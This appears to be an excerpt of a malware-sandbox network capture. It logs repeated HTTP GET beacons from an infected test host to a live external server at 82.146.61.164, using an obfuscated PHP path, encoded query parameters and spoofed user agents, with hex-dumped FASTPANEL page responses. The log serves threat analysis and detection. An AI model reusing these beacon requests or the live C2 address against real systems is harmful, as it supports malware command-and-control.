Apr 23, 2024 14:47:58.186276913 CEST	606	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:47:58.429574013 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:58 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:47:58.429778099 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:47:58.429820061 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:47:58.429941893 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:47:58.429980040 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:47:58.430160999 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:47:58.430217981 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:47:58.430375099 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:47:58.430411100 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:47:58.430520058 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:47:58.673466921 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:47:58.674746037 CEST	582	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 82.146.61.164
Apr 23, 2024 14:47:58.918335915 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:47:58 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.5	49721	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:48:14.304297924 CEST	631	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:48:14.546708107 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:14 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:48:14.546916962 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:48:14.546958923 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:48:14.547163010 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:48:14.547199965 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:48:14.547410965 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:48:14.547447920 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
Apr 23, 2024 14:48:14.547631979 CEST	1289	IN	Data Raw: 75 53 37 42 32 4f 58 73 39 46 6e 52 63 48 44 57 41 63 42 38 44 33 44 7a 7a 69 54 59 5a 37 53 57 6a 55 49 54 6c 73 32 73 4d 61 63 66 76 61 75 6f 33 63 69 79 46 45 62 6a 62 46 66 68 48 57 38 54 53 34 4a 57 4a 67 78 52 32 48 55 46 72 77 45 5a 6d 77 Data Ascii: uS7B2OXs9FnRcHDWAcB8D3DzziTYZ7SWjUITls2sMacfvauo3ciyFEbjbFfhHW8TS4JWJgxR2HUFrwEZmwjo5kL8RocBUbHZSiG6LrllRQNjoKm7d26X4I2UunXMWmL8dgPkzrIAsa998mCnCcLFOe58z7GXGShabKeP4Y5Lqq2GQX/b83Ul1ULkCgb+bA+4/dvDnguuE2iN9uYLwiAtBGPgBC42kDf5C5wBUNXozN81/WML4NU
Apr 23, 2024 14:48:14.547669888 CEST	1289	IN	Data Raw: 4e 35 72 52 6f 45 6c 79 30 62 48 48 78 74 44 67 54 39 39 31 4e 2b 39 78 4c 47 73 33 71 44 62 4b 2f 61 71 54 73 45 67 5a 2f 34 45 6b 65 71 2b 6a 7a 38 6b 71 79 34 57 77 61 77 31 35 59 58 56 44 63 74 6d 45 78 55 6f 6d 77 49 68 4e 6d 62 30 2f 77 70 Data Ascii: N5rRoEly0bHHxtDgT991N+9xLGs3qDbK/aqTsEgZ/4Ekeq+jz8kqy4Wwaw15YXVDctmExUomwIhNmb0/wpQK+bZh95rRotcPb2MCls97BsoWZhvVBAEd4BH7sydTcVa/mxpbkbLuTTjNch/KS2FELgpHgpm1YNzrPJVWUjtbUvWbsbDYxjZJLWuDWGWuSXoXhCFCW4c80XxaPNtD1pomwI8gosnMW0bIMK+s1jnBvywz6Poasxm
Apr 23, 2024 14:48:14.547705889 CEST	1289	IN	Data Raw: 48 75 46 2f 4e 4b 42 75 4a 78 65 46 33 61 4d 65 72 6b 68 73 42 46 2f 62 43 34 4f 73 31 6d 4d 59 69 2f 48 35 52 47 2b 47 58 62 6b 4b 50 43 5a 79 78 45 46 4d 35 42 77 4c 50 66 51 36 38 43 35 6c 45 4f 54 4f 5a 48 63 41 51 44 47 31 62 41 61 4f 41 65 Data Ascii: HuF/NKBuJxeF3aMerkhsBF/bC4Os1mMYi/H5RG+GXbkKPCZyxEFM5BwLPfQ68C5lEOTOZHcAQDG1bAaOAed3bKE6rRgszF2WDF1wHt610hN77AoM37aX4rDO+ghTV/8zw/YuVfoFRTqtGC09z6Xwaxrg2+Q+Y6opG0PgvFY/LW2twZO3KUj+kNTgtG/9Kq2R7iuDiNVQnAuN4VQrY5FQ0lrdRNPJM7POGtWZXQTcTZwS4GfIG07
Apr 23, 2024 14:48:14.789695024 CEST	1289	IN	Data Raw: 4d 69 49 49 59 31 79 76 59 33 77 54 6c 54 6b 4c 6b 38 6e 78 63 63 6f 4c 5a 46 57 5a 45 54 69 66 34 54 72 66 6d 72 78 51 4e 6b 44 63 4e 34 47 34 2f 36 4a 4b 36 56 61 35 73 4b 51 64 6a 62 65 48 4a 72 48 54 72 66 6a 2b 67 52 4d 66 33 58 67 74 41 48 Data Ascii: MiIIY1yvY3wTlTkLk8nxccoLZFWZETif4TrfmrxQNkDcN4G4/6JK6Va5sKQdjbeHJrHTrfj+gRMf3XgtAHP/yPaLJAK2mERLOEnFlZwgdjeqEZ7TPVllygPYt1zrYKvOSVHgKDDqE8jymkvZgKzTM5FHXL5EuA7tLLRdLc5xnvFxuuS/ANl0dagEDDoky9UQpu5ewly949L4unSgTTc6psGROfeFjTSNxoZVEWi6LkFMoiWlq1z
Apr 23, 2024 14:48:14.791205883 CEST	607	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&nTpz4tBkEffHSxvJX2feX5v=PFt&EW3lilo=8ZvGO6YDsWpwXo96D7U HTTP/1.1 Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 82.146.61.164
Apr 23, 2024 14:48:15.033746004 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:14 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.5	49722	82.146.61.164	80

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 14:48:25.597404957 CEST	610	OUT	GET /localUniversal/3Dumpprocessor/GameWordpresstrack6/eternal4/flower8Testdump/Longpolllongpoll/Securehttpwplocal.php?gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6&6b216a87848e812b8911d54c09e60b83=1a5c78d0b59f0e27da6ac915b871b18e&ba66ccabe5baf5dd4d2b1b6e621d0986=gNyUTMlZGOjF2MlNGOwADM3MmNzgDOwQGMlZ2NhlTO0IWOjRTN3czN&gcnWXuE9MUipBZc=bVK2py9yji&Y5YSB7xC1sNfAEv19t=v6 HTTP/1.1 Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 82.146.61.164 Connection: Keep-Alive
Apr 23, 2024 14:48:25.834140062 CEST	241	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Tue, 23 Apr 2024 12:48:25 GMT Content-Type: text/html Content-Length: 15793 Last-Modified: Tue, 23 Jan 2024 12:23:56 GMT Connection: keep-alive ETag: "65afafdc-3db1" Accept-Ranges: bytes
Apr 23, 2024 14:48:25.834398985 CEST	1289	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 Data Ascii: <!DOCTYPE html><html><head> <title>FASTPANEL</title> <meta name="robots" content="noindex,nofollow"></head><body><div style="width:1100px;height:230px;position:absolute;left:50%;top:50%; margin-left:-550px;margin-top:-50px;text-al
Apr 23, 2024 14:48:25.834439993 CEST	1289	IN	Data Raw: 63 6d 6c 32 5a 57 52 47 63 6d 39 74 49 48 4e 30 55 6d 56 6d 4f 6d 6c 75 63 33 52 68 62 6d 4e 6c 53 55 51 39 49 6e 68 74 63 43 35 70 61 57 51 36 51 6a 45 33 51 55 49 30 4d 30 52 47 51 30 52 47 4d 54 46 46 4e 6b 46 47 4e 54 55 34 52 6b 45 79 51 6b Data Ascii: cml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6QjE3QUI0M0RGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6QjE3QUI0M0VGQ0RGMTFFNkFGNTU4RkEyQkZDQTZGMjQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2t
Apr 23, 2024 14:48:25.834544897 CEST	1289	IN	Data Raw: 55 45 32 33 45 76 6c 38 32 59 34 4a 7a 4a 46 67 37 41 66 32 69 45 35 36 4a 42 34 39 5a 46 4d 37 7a 43 34 43 4b 46 55 46 35 38 7a 39 47 36 55 4a 71 74 74 76 4d 57 77 6a 48 32 51 61 58 6c 31 68 4d 6f 47 59 59 34 44 37 37 41 76 32 68 59 52 4b 68 73 Data Ascii: UE23Evl82Y4JzJFg7Af2iE56JB49ZFM7zC4CKFUF58z9G6UJqttvMWwjH2QaXl1hMoGYY4D77Av2hYRKhsvGur3ZLQDC3h/siAOcETJ6Ip2K/58KGFgsaEu5feGRzQnU+sbGz5OwYz7JLQcG+hS7imMf7uCnztG8bp1bgp9LM/vUOb+fo61KneMfnSxFLLXyhy/O0TFiXU5fnOA4ou7numDsjHM0LvNB7Gu0twEbeM1yJ90SASE
Apr 23, 2024 14:48:25.834583044 CEST	1289	IN	Data Raw: 79 55 73 4e 79 51 6f 6b 46 42 32 74 64 61 48 46 66 76 6f 68 2b 59 33 50 77 58 73 64 39 4f 77 62 4e 73 4b 48 46 63 59 38 76 6a 6c 69 50 4a 5a 4f 79 73 31 66 4b 69 72 47 69 2b 4b 42 74 4c 56 50 71 4b 73 59 53 62 4d 59 46 76 43 70 2b 78 67 33 36 56 Data Ascii: yUsNyQokFB2tdaHFfvoh+Y3PwXsd9OwbNsKHFcY8vjliPJZOys1fKirGi+KBtLVPqKsYSbMYFvCp+xg36VVeTvH+Pt9Ctc9U0wh5TK9BKLY+llgW7oVu9Y2UGZhOphsr8+JRTmSZMeKhYZ6pdckm2679m4DKGEJ90Letb1FsbHIfBTnOx0i8Kzb8ismOF824NR2S7MA8iLmhNQHF5O0usd3ImCRBaNF/H9J4XHWIVYNfRxgbIb4
Apr 23, 2024 14:48:25.834902048 CEST	1289	IN	Data Raw: 69 69 39 67 76 51 2f 4c 67 75 31 41 4b 42 68 67 63 57 78 6c 44 50 35 49 74 31 42 39 6c 67 36 79 6e 30 34 70 38 63 59 6e 5a 30 4c 38 56 6f 41 77 4f 6c 48 50 38 71 42 54 7a 53 63 45 34 33 38 4f 42 32 79 67 7a 4a 32 67 44 38 74 50 57 44 66 49 64 6e Data Ascii: ii9gvQ/Lgu1AKBhgcWxlDP5It1B9lg6yn04p8cYnZ0L8VoAwOlHP8qBTzScE438OB2ygzJ2gD8tPWDfIdnXxyMfNCMr5A0OUMepsGQXedkFNmDGUSOAhyw5kfXMUIp3OlTAWPowKjP9HspsWqQeC8DFlgekEwfkp0MsAyXRBvmKBKxRRdFWBl35ulQ7Jw7c3U3dwCkg6IssGMcRkP4vNUKQhQIGgRtgfj4zTNbp5LrBrczLwIcA
Apr 23, 2024 14:48:25.834939003 CEST	1289	IN	Data Raw: 30 69 38 77 32 70 35 56 67 38 42 31 47 64 4c 58 4d 37 72 69 42 4d 55 36 6a 48 4a 6b 37 32 66 65 38 38 78 70 58 4c 6c 6f 33 6d 56 34 6e 79 30 77 71 37 4a 78 6b 49 6f 58 62 52 65 6f 50 31 70 50 7a 55 33 4a 51 55 41 7a 49 46 79 75 44 57 77 7a 31 47 Data Ascii: 0i8w2p5Vg8B1GdLXM7riBMU6jHJk72fe88xpXLlo3mV4ny0wq7JxkIoXbReoP1pPzU3JQUAzIFyuDWwz1GNMbwdOT+MY+hjdwf/zxVUhFBceX5XeMsY1sBkz4zUzhvBFQbo7urAP8C5UYPQMzXfYlFWD4JNlg2NvNKpShkVuXJTEz+ZdZ3LH2tbSfjlQ8SYoCt2y4X3GxnILG89X1Ggu/odoMw0QUK1sBu8EvBOV/o3+0+1ZNQw
